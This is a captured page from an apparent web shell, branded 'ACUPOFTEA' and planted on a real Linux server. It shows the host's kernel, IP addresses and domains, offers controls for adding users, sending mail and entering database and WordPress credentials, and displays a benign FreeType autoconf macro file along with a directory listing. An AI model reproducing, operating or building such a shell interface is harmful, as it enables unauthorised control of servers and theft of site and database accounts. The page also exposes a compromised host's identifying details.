System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
aclocal
/
216.73.216.49
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
freetype2.m4
# Configure paths for FreeType2 # Marcelo Magallon 2001-10-26, based on gtk.m4 by Owen Taylor # # Copyright 2001-2018 by # David Turner, Robert Wilhelm, and Werner Lemberg. # # This file is part of the FreeType project, and may only be used, modified, # and distributed under the terms of the FreeType project license, # LICENSE.TXT. By continuing to use, modify, or distribute this file you # indicate that you have read the license and understand and accept it # fully. # # As a special exception to the FreeType project license, this file may be # distributed as part of a program that contains a configuration script # generated by Autoconf, under the same distribution terms as the rest of # that program. # # serial 4 # AC_CHECK_FT2([MINIMUM-VERSION [, ACTION-IF-FOUND [, ACTION-IF-NOT-FOUND]]]) # Test for FreeType 2, and define FT2_CFLAGS and FT2_LIBS. # MINIMUM-VERSION is what libtool reports; the default is `7.0.1' (this is # FreeType 2.0.4). # AC_DEFUN([AC_CHECK_FT2], [# Get the cflags and libraries from the freetype-config script # AC_ARG_WITH([ft-prefix], dnl don't quote AS_HELP_STRING! AS_HELP_STRING([--with-ft-prefix=PREFIX], [Prefix where FreeType is installed (optional)]), [ft_config_prefix="$withval"], [ft_config_prefix=""]) AC_ARG_WITH([ft-exec-prefix], dnl don't quote AS_HELP_STRING! AS_HELP_STRING([--with-ft-exec-prefix=PREFIX], [Exec prefix where FreeType is installed (optional)]), [ft_config_exec_prefix="$withval"], [ft_config_exec_prefix=""]) AC_ARG_ENABLE([freetypetest], dnl don't quote AS_HELP_STRING! AS_HELP_STRING([--disable-freetypetest], [Do not try to compile and run a test FreeType program]), [], [enable_fttest=yes]) if test x$ft_config_exec_prefix != x ; then ft_config_args="$ft_config_args --exec-prefix=$ft_config_exec_prefix" if test x${FT2_CONFIG+set} != xset ; then FT2_CONFIG=$ft_config_exec_prefix/bin/freetype-config fi fi if test x$ft_config_prefix != x ; then ft_config_args="$ft_config_args --prefix=$ft_config_prefix" if test x${FT2_CONFIG+set} != xset ; then FT2_CONFIG=$ft_config_prefix/bin/freetype-config fi fi if test "x$FT2_CONFIG" = x ; then AC_PATH_TOOL([FT2_CONFIG], [freetype-config], [no]) fi min_ft_version=m4_if([$1], [], [7.0.1], [$1]) AC_MSG_CHECKING([for FreeType -- version >= $min_ft_version]) no_ft="" if test "$FT2_CONFIG" = "no" ; then no_ft=yes else FT2_CFLAGS=`$FT2_CONFIG $ft_config_args --cflags` FT2_LIBS=`$FT2_CONFIG $ft_config_args --libs` ft_config_major_version=`$FT2_CONFIG $ft_config_args --version | \ sed 's/\([[0-9]]*\).\([[0-9]]*\).\([[0-9]]*\)/\1/'` ft_config_minor_version=`$FT2_CONFIG $ft_config_args --version | \ sed 's/\([[0-9]]*\).\([[0-9]]*\).\([[0-9]]*\)/\2/'` ft_config_micro_version=`$FT2_CONFIG $ft_config_args --version | \ sed 's/\([[0-9]]*\).\([[0-9]]*\).\([[0-9]]*\)/\3/'` ft_min_major_version=`echo $min_ft_version | \ sed 's/\([[0-9]]*\).\([[0-9]]*\).\([[0-9]]*\)/\1/'` ft_min_minor_version=`echo $min_ft_version | \ sed 's/\([[0-9]]*\).\([[0-9]]*\).\([[0-9]]*\)/\2/'` ft_min_micro_version=`echo $min_ft_version | \ sed 's/\([[0-9]]*\).\([[0-9]]*\).\([[0-9]]*\)/\3/'` if test x$enable_fttest = xyes ; then ft_config_is_lt="" if test $ft_config_major_version -lt $ft_min_major_version ; then ft_config_is_lt=yes else if test $ft_config_major_version -eq $ft_min_major_version ; then if test $ft_config_minor_version -lt $ft_min_minor_version ; then ft_config_is_lt=yes else if test $ft_config_minor_version -eq $ft_min_minor_version ; then if test $ft_config_micro_version -lt $ft_min_micro_version ; then ft_config_is_lt=yes fi fi fi fi fi if test x$ft_config_is_lt = xyes ; then no_ft=yes else ac_save_CFLAGS="$CFLAGS" ac_save_LIBS="$LIBS" CFLAGS="$CFLAGS $FT2_CFLAGS" LIBS="$FT2_LIBS $LIBS" # # Sanity checks for the results of freetype-config to some extent. # AC_RUN_IFELSE([ AC_LANG_SOURCE([[ #include <ft2build.h> #include FT_FREETYPE_H #include <stdio.h> #include <stdlib.h> int main() { FT_Library library; FT_Error error; error = FT_Init_FreeType(&library); if (error) return 1; else { FT_Done_FreeType(library); return 0; } } ]]) ], [], [no_ft=yes], [echo $ECHO_N "cross compiling; assuming OK... $ECHO_C"]) CFLAGS="$ac_save_CFLAGS" LIBS="$ac_save_LIBS" fi # test $ft_config_version -lt $ft_min_version fi # test x$enable_fttest = xyes fi # test "$FT2_CONFIG" = "no" if test x$no_ft = x ; then AC_MSG_RESULT([yes]) m4_if([$2], [], [:], [$2]) else AC_MSG_RESULT([no]) if test "$FT2_CONFIG" = "no" ; then AC_MSG_WARN([ The freetype-config script installed by FreeType 2 could not be found. If FreeType 2 was installed in PREFIX, make sure PREFIX/bin is in your path, or set the FT2_CONFIG environment variable to the full path to freetype-config. ]) else if test x$ft_config_is_lt = xyes ; then AC_MSG_WARN([ Your installed version of the FreeType 2 library is too old. If you have different versions of FreeType 2, make sure that correct values for --with-ft-prefix or --with-ft-exec-prefix are used, or set the FT2_CONFIG environment variable to the full path to freetype-config. ]) else AC_MSG_WARN([ The FreeType test program failed to run. If your system uses shared libraries and they are installed outside the normal system library path, make sure the variable LD_LIBRARY_PATH (or whatever is appropriate for your system) is correctly set. ]) fi fi FT2_CFLAGS="" FT2_LIBS="" m4_if([$3], [], [:], [$3]) fi AC_SUBST([FT2_CFLAGS]) AC_SUBST([FT2_LIBS])]) # end of freetype2.m4
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:31
..
DIR
-
drwxr-xr-x
2025-10-16 10:59:21
bison-i18n.m4
text/x-m4
1.88 KB
-rw-r--r--
2019-10-12 12:28:39
codeset.m4
text/x-m4
842 B
-rw-r--r--
2016-03-20 07:37:53
extern-inline.m4
text/x-m4
4.27 KB
-rw-r--r--
2016-05-28 12:29:03
fcntl-o.m4
text/x-m4
4.56 KB
-rw-r--r--
2016-03-20 07:37:53
fontutil.m4
text/x-m4
13.83 KB
-rw-r--r--
2021-10-09 11:41:50
freetype2.m4
text/x-c
6.18 KB
-rw-r--r--
2018-04-22 09:41:36
gettext.m4
text/x-c
15.49 KB
-rw-r--r--
2016-05-28 12:29:03
glibc2.m4
text/x-c
830 B
-rw-r--r--
2016-03-20 07:37:53
glibc21.m4
text/x-c
907 B
-rw-r--r--
2016-03-20 07:37:53
gpg-error.m4
text/x-m4
4.65 KB
-rw-r--r--
2019-10-12 12:20:46
gpgrt.m4
text/x-m4
4.61 KB
-rw-r--r--
2019-10-12 12:20:46
iconv.m4
text/x-c
9.06 KB
-rw-r--r--
2016-03-20 07:37:53
intdiv0.m4
text/x-c
2.35 KB
-rw-r--r--
2016-05-28 12:29:03
intl.m4
text/x-m4
11.84 KB
-rw-r--r--
2016-03-20 07:37:53
intldir.m4
text/x-m4
917 B
-rw-r--r--
2016-03-20 07:37:53
intlmacosx.m4
text/x-m4
2.47 KB
-rw-r--r--
2016-03-20 07:37:53
intmax.m4
text/x-c
1.1 KB
-rw-r--r--
2016-03-20 07:37:53
inttypes-pri.m4
text/x-c
1.22 KB
-rw-r--r--
2016-03-20 07:37:53
inttypes_h.m4
text/x-c
1020 B
-rw-r--r--
2016-03-20 07:37:53
lcmessage.m4
text/x-m4
1.33 KB
-rw-r--r--
2016-03-20 07:37:53
lib-ld.m4
text/x-m4
3.6 KB
-rw-r--r--
2016-06-11 12:59:32
lib-link.m4
text/x-m4
32.28 KB
-rw-r--r--
2016-06-11 12:59:32
lib-prefix.m4
text/x-m4
8.27 KB
-rw-r--r--
2016-06-11 12:59:32
libgcrypt.m4
text/x-m4
6.09 KB
-rw-r--r--
2022-06-28 11:54:07
libtool.m4
text/x-m4
298.69 KB
-rw-r--r--
2019-10-11 02:55:28
libxml.m4
text/x-c
7.7 KB
-rw-r--r--
2017-07-23 05:10:06
libxslt.m4
text/x-c
7.93 KB
-rw-r--r--
2009-05-12 06:29:34
lock.m4
text/x-m4
1.43 KB
-rw-r--r--
2016-03-20 07:37:53
longlong.m4
text/x-m4
4.63 KB
-rw-r--r--
2016-03-20 07:37:53
ltargz.m4
text/x-m4
2.51 KB
-rw-r--r--
2019-10-11 02:55:28
ltdl.m4
text/x-Algol68
29.33 KB
-rw-r--r--
2019-10-11 02:55:28
ltoptions.m4
text/x-m4
14.17 KB
-rw-r--r--
2019-10-11 02:55:28
ltsugar.m4
text/plain
4.28 KB
-rw-r--r--
2019-10-11 02:55:28
ltversion.m4
text/plain
699 B
-rw-r--r--
2019-10-11 02:55:28
lt~obsolete.m4
text/plain
6 KB
-rw-r--r--
2019-10-11 02:55:28
mysql.m4
text/x-m4
4.12 KB
-rw-r--r--
2025-07-28 03:52:28
nls.m4
text/x-m4
1.19 KB
-rw-r--r--
2016-03-20 07:37:53
pkg.m4
text/x-m4
12.37 KB
-rw-r--r--
2017-03-24 05:16:18
po.m4
text/x-m4
18.52 KB
-rw-r--r--
2016-03-20 07:37:53
printf-posix.m4
text/x-c
1.54 KB
-rw-r--r--
2016-03-20 07:37:53
progtest.m4
text/x-m4
3.02 KB
-rw-r--r--
2016-03-20 07:37:53
size_max.m4
text/x-c
2.99 KB
-rw-r--r--
2016-03-20 07:37:53
stdint_h.m4
text/x-m4
995 B
-rw-r--r--
2016-03-20 07:37:53
threadlib.m4
text/x-c
14.8 KB
-rw-r--r--
2016-03-20 07:37:53
uintmax_t.m4
text/x-m4
1.09 KB
-rw-r--r--
2016-03-20 07:37:53
visibility.m4
text/x-m4
3.27 KB
-rw-r--r--
2016-03-20 07:37:53
wchar_t.m4
text/x-m4
818 B
-rw-r--r--
2016-03-20 07:37:53
wint_t.m4
text/x-c
1.03 KB
-rw-r--r--
2016-03-20 07:37:53
xsize.m4
text/x-m4
406 B
-rw-r--r--
2016-03-20 07:37:53
~ ACUPOFTEA - mail.ontime-ae.com